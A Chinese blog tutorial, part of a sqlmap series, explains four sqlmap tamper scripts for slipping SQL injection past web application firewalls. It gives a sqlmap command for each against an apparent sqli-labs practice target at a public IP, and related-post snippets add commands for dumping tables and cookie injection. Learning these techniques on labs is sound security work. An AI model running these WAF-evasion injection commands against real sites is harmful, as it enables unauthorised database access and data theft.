sqlmap实战oracle,sqlmap从入门到精通-第七章-7-3 绕过WAF脚本-4-7脚本

最新推荐文章于 2024-02-21 21:29:56 发布
最新推荐文章于 2024-02-21 21:29:56 发布
阅读量135 收藏
点赞数
文章标签: sqlmap实战oracle

4. base64encode.py脚本

给指定的payload全部字符进行base64编码,适用于所有数据库,这个很好理解,直接看演示

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="base64encode.py" --proxy="http://127.0.0.1:8080" -batch

下面的演示的效果图:

361cb7b114be35d143db1ba4dd77e44b.png

发现并没注入成功,我们看看burp上面抓包的情况

91e9244f568371f8ddb33aad33673a70.png

da92d6bc10bd1858334ae3c4a71f1358.png

可确认确实进行base64编码

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

5. between.py脚本

是根据实际情况分别将大于号">" 替换为"NOT BETWEEN 0 AND" , 等于号 "=" 替换为"BETWEEN AND" 适用于所有数据库

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="between.py" --proxy="http://127.0.0.1:8080" -batch

下面的演示的效果图:

e7bbae8aadbc5c4e4a9e7c69f1e8e31f.png

发现是可以注入成功

675ed47cf3715f157ef2f6c3398f5dd5.png

burp抓包效果

059de24d914f6effcb8995b8829f111c.png

发现并没有等于号,等于号有已经被替换了

0e39829e0ef29c0a68dad77301562c0f.png

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

6. bluecoat.py脚本

在SQL注入的语句后面添加有效的随机空白符用来替换空格符,之后使用"LIKE" 来替换等于号 "=" ,这里替换的过程中,显示的URL编码是"%09" 这个就表示空格,适用于MySQL数据库5.1,作者提到一个SGOS 这个真不认识,在网上搜索了下没找到好的解释。

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="bluecoat.py" --proxy="http://127.0.0.1:8080" -batch

下面的演示的效果图:

f37f792b1a5c532ffec5b222d4517413.png

发现是可以注入成功

4200b961cdbfe529792d6d3dc6cf89c4.png

burpsuite查看注入的payload

f6a5654464c024f629dda6284b5ac2b8.png

de5eb9a6df8a59abb856515d3187c966.png

根据上面结果可知是替换为了url编码%09

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

7. chardoubleencode.py脚本

对指定的payload的全部字符使用双重URL编码,对于已经编码的字符不做处理,简单点理解就是对payload进行二次编码,适用于所有数据库

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="chardoubleencode.py" --proxy="http://127.0.0.1:8080" -batch

下面的演示的效果图:

78b5875a37e3d68591b7d2286cb2c87b.png

发现注入并不成功,我们看看Burpsuite的抓包情况

0bf63c3b09b4e0f78998a38323e5b14c.png

d0d28bfe2d969899932031b7fb6f8c56.png

根据显示确实进行了两次编码

weixin_39534002
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
综上所述,SQLMAP是一个强大的渗透测试工具,其绕WAF脚本集合是针对不同情况下的解决方案库。掌握和运用SQLMAP,能够帮助安全从业者更好地发现和评估Web应用程序的安全状况,及时修复SQL注入漏洞,保护数据安全。在...
sqlmapproject-sqlmap-1.5.7-1.zip
09-28
9. **绕过安全机制**:它可以绕过各种防御机制,如WAF(Web应用防火墙)。 10. **易于使用**:SQLmap提供命令行界面,具有丰富的参数选项,使得新手也能快速上手。 在压缩包"sqlmapproject-sqlmap-1f3a141"中,...
sqlmap常用tamper汇总及使用指导
Thunderclap的博客
02-15 1737
sqlmap常用tamper汇总及使用指导
python】base64编解码
amber_o0k的博客
01-24 220
【代码】【python】base64编解码。
sqlmap安装与简单命令
HOU_XIAO_BAI的博客
12-06 960
绕过waf防火墙:sqlmap.py -u 注入点 -v 3 --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py。–dump -T “” -D “” -C “” #列出指定数据库的表的字段的数据(–dump -T users -D master -C surname)cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2。
SQLMAP工具之实战渗透技巧三
Longwaer
02-08 800
学习使用SQLMAP各种小技巧,便于渗透测试中的灵活使用。
SQL注入-Oracle手工+sqlmap
xiaoheizi的博客
06-28 1172
-dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列)sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字。--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段。--privileges #查看用户权限(--privileges -U root)sqlmap 数据库注入数据猜解。
sqlmapproject-sqlmap-1.5.8
08-14
这些技术的实现得益于其强大的字典和数据生成策略,可以有效地绕过WAF(Web应用防火墙)和其他安全防护措施。 2. **数据提取**:找到注入点后,SQLMap可以读取数据库中的表名、列名,并进一步获取数据。它可以自动...
sqlmap-1.3.7-19.zip
07-12
6. **隐写术支持**:可以使用隐藏数据的方法,如Base64编码,绕过WAF(Web应用防火墙)的检测。 7. **多线程和并发**:支持多线程和并发请求,加快扫描速度。 8. **自定义脚本**:允许用户编写自定义的Python插件...
sqlmap-wiki-zhcn::syringe:可能是最完整的sqlmap中文文档
02-04
- **绕过WAF**:针对Web应用防火墙,SQLMap提供了一些技巧和方法来规避检测。 - **批量处理**:支持批量处理多个目标,如通过文件导入URL列表。 - **POST请求**:处理POST数据时,需要指定`--data`参数。 **文档...
SqlMap——Oracle注入教程
W小哥
12-01 3848
一、漏洞复现 靶场注入点: http://59.63.200.79:8808/?id=1 1、使用sqlmap检测是否存在注入点 python sqlmap.py -u "http://59.63.200.79:8808/?id=1" --random-agent 检测发现存在注入点,注入点在参数id的位置,数据库为Oracle数据库 2、查看Oracle中全部的数据库 python sqlmap.py -u "http://59.63.200.79:8808/?id=1" --random-agen
一次平平无奇的 Oracle 注入
黑战士的博客
02-20 739
在之前的测试中也发现了,当数据库报错时,返回的请求结果和正常是不一样的,所以可以利用这两个不同的页面差异构造布尔盲注,Oracle 数据库可以利用 1/0 报错的特性(Mysql就不会报错),将时间盲注转换成布尔盲注。接下来就是修改具体的查询数据的语句了,其中有些 %s 占位符是命令行的输入,如 下面的 TABLE_NAME 的值就是命令行输入的 -T 参数的值。修改完成后,再使用 Sqlmap 跑数据,不断根据返回确定查询方法,根据请求结果调整 SQL 语句,最终能够跑起来了。
SQL注入之oracle注入+SQLbypass+sqlmap实战
最新发布
2301_80661529的博客
02-21 1146
Oracle数据库是全球最知名的关系型数据库管理系统(RDBMS)之一,由美国甲骨文公司(Oracle Corporation)开发并维护。作为企业级数据管理解决方案的市场领导者,Oracle数据库在可靠性、安全性、可伸缩性和性能方面具有卓越表现,被广泛应用于各类关键业务场景,包括金融、电信、政府和大型企业的各种复杂应用。**核心特性:**
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本
热门推荐
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
记一次使用sqlmaporacle进行like注入
weixin_45439432的博客
12-17 3897
环境:jsp+oracle 从FUZZ的结果以及http响应的长度来看,普通的注入被waf拦截,存在like注入 like注入其实也并不是两边都要有 %,我们只需要闭合单引号就行了: 接下来用sysdata参数可以确定数据库为oracle。 sysdata函数为oracle数据库的日期,length求的是字符长度,可构造语句: 1’ AND LENGTH(SYSDATE) LIKE LENGTH(SYSDATE) AND ‘NGjD’ LIKE 'NGjD 现在可以确定存在注入了,于是移步到工具使用环
sqlmap注入oracle库,2020-04-01 sqlmap注入神器SQLMap工具技巧
weixin_39966053的博客
04-07 1258
sqlmap.py -u http://192.168.0.108/sqlserver/1.aspx?xxser=1sqlmap.py -uhttp://192.168.0.108/sqlserver/1.aspx?xxser=1 --leve=3–-level=LEVEL 执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数,当...
第79篇:记一次Oracle注入漏洞提权的艰难过程
ABC_123的博客
10-28 1811
Part1 前言大家好,我是ABC_123。前不久遇到一个Oracle注入漏洞,是搜索型的盲注漏洞,只能用折半法一个字符一个字符的猜解数据,使用sqlmap可以直接跑出来,经过判断是DBA权限。接下来就是想办法通过这个注入点获取操作系统的权限,但是遇到了很多问题,于是搭建环境研究了一天,最后终于获取系统权限,本期ABC_123就把这个案例分享给大家。注:本篇文章中的一些说法可能与其它文章不一样...
python中base64编码与解码
weixin_30293079的博客
07-26 1162
引言:   在一些项目中,接口的报文是通过base64加密传输的,所以在进行接口自动化时,需要对所传的参数进行base64编码,对拿到的响应报文进行解码; Base64编码是一种“防君子不防小人”的编码方式。广泛应用于MIME协议,作为电子邮件的传输编码,生成的编码可逆,后一两位可能有“=”,生成的编码都是ascii字符。优点:速度快,ascii字符,肉眼不可理解缺点:编码比较长,非常容...
iBATIS SQLMap开发指南:从入门到精通
iBATIS-SqlMaps-2_开发手册_中文版.pdf iBATIS SQLMaps 开发指南是针对 ...iBATIS SQL Maps 2.0开发手册提供了全面的指导,涵盖了从安装、配置到实际数据库操作的各个环节,是开发者掌握iBATIS框架的关键参考资料。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值